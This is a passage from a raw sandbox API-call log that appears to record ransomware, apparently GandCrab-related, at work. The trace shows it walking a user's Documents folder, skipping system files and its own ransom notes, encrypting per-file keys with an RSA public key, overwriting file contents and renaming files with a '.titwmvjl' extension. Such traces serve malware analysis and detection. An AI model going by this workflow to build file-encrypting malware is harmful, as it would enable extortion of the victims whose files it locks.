dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.481] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.481] GetLastError () returned 0x0 [0090.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.482] CryptDestroyKey (hKey=0x503238) returned 1 [0090.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.482] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.482] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.482] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.482] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x11f7d, lpOverlapped=0x0) returned 1 [0090.490] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffee083, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.491] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11f7d, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x11f7d, lpOverlapped=0x0) returned 1 [0090.492] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.492] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.494] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.497] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.498] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.498] CloseHandle (hObject=0x248) returned 1 [0090.499] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\xzw b4g_jotbfhsht.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\xzw b4g_jotbfhsht.csv.titwmvjl"), dwFlags=0x1) returned 1 [0090.499] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.499] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0090.499] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0090.500] CloseHandle (hObject=0x2d4) returned 1 [0090.500] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.500] lstrcmpW (lpString1="GQLgktaZ.doc", lpString2=".") returned 1 [0090.500] lstrcmpW (lpString1="GQLgktaZ.doc", lpString2="..") returned 1 [0090.500] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="GQLgktaZ.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc" [0090.500] lstrlenW (lpString=".titwmvjl") returned 9 [0090.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc") returned 109 [0090.501] VirtualAlloc (lpAddress=0x0, dwSize=0x11a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.501] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc.titwmvjl") returned 118 [0090.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc") returned 109 [0090.501] lstrlenW (lpString=".doc") returned 4 [0090.501] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.501] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".doc ") returned 5 [0090.501] lstrcmpiW (lpString1=".doc", lpString2=".titwmvjl") returned -1 [0090.501] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc") returned 109 [0090.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc") returned 109 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="desktop.ini") returned 1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="autorun.inf") returned 1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="ntuser.dat") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="iconcache.db") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="bootsect.bak") returned 1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="boot.ini") returned 1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="ntuser.dat.log") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="thumbs.db") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="KRAB-DECRYPT.html") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="CRAB-DECRYPT.html") returned 1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.501] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.502] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="ntldr") returned -1 [0090.502] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="NTDETECT.COM") returned -1 [0090.502] lstrcmpiW (lpString1="GQLgktaZ.doc", lpString2="Bootfont.bin") returned 1 [0090.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc") returned 109 [0090.502] lstrlenW (lpString=".doc") returned 4 [0090.502] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.502] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".doc ") returned 5 [0090.502] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.502] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.502] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\gqlgktaz.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0090.503] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.503] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0090.503] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.503] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.505] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.505] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.505] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.505] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0090.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.505] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.505] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.505] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.506] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.507] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.507] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.507] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0090.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.507] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.507] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.507] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.509] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.509] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5032f8) returned 1 [0090.509] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.509] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.509] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.509] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.509] GetLastError () returned 0x0 [0090.509] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.510] CryptDestroyKey (hKey=0x5032f8) returned 1 [0090.510] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.510] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.510] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.510] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.511] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0090.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.511] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.511] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.512] GetLastError () returned 0x0 [0090.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.512] CryptDestroyKey (hKey=0x503738) returned 1 [0090.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.512] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.512] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.513] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.513] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x5d05, lpOverlapped=0x0) returned 1 [0090.520] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffa2fb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.520] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5d05, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x5d05, lpOverlapped=0x0) returned 1 [0090.521] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0090.522] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.526] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.526] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.526] CloseHandle (hObject=0x2d4) returned 1 [0090.527] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\gqlgktaz.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\GQLgktaZ.doc.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\gqlgktaz.doc.titwmvjl"), dwFlags=0x1) returned 1 [0090.528] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.528] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.528] lstrcmpW (lpString1="mgfIrqsWdR.xlsx", lpString2=".") returned 1 [0090.528] lstrcmpW (lpString1="mgfIrqsWdR.xlsx", lpString2="..") returned 1 [0090.528] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="mgfIrqsWdR.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx" [0090.528] lstrlenW (lpString=".titwmvjl") returned 9 [0090.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx") returned 112 [0090.528] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.528] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx.titwmvjl") returned 121 [0090.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx") returned 112 [0090.528] lstrlenW (lpString=".xlsx") returned 5 [0090.528] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.529] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0090.529] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0090.529] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx") returned 112 [0090.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx") returned 112 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="desktop.ini") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="autorun.inf") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="ntuser.dat") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="iconcache.db") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="bootsect.bak") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="boot.ini") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="ntuser.dat.log") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="thumbs.db") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="CRAB-DECRYPT.html") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="ntldr") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="NTDETECT.COM") returned -1 [0090.529] lstrcmpiW (lpString1="mgfIrqsWdR.xlsx", lpString2="Bootfont.bin") returned 1 [0090.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx") returned 112 [0090.529] lstrlenW (lpString=".xlsx") returned 5 [0090.529] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.529] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0090.529] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.530] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.530] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\mgfIrqsWdR.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\mgfirqswdr.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0090.530] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.530] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0090.531] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.531] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.532] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.532] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.533] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.533] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0090.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.533] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.533] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.533] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0090.533] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.534] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.534] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.534] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0090.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.534] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.534] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.534] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0090.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.535] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503438) returned 1 [0090.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.535] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0090.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.535] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0090.535] GetLastError () returned 0x0 [0090.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.536] CryptDestroyKey (hKey=0x503438) returned 1 [0090.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.536] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.536] 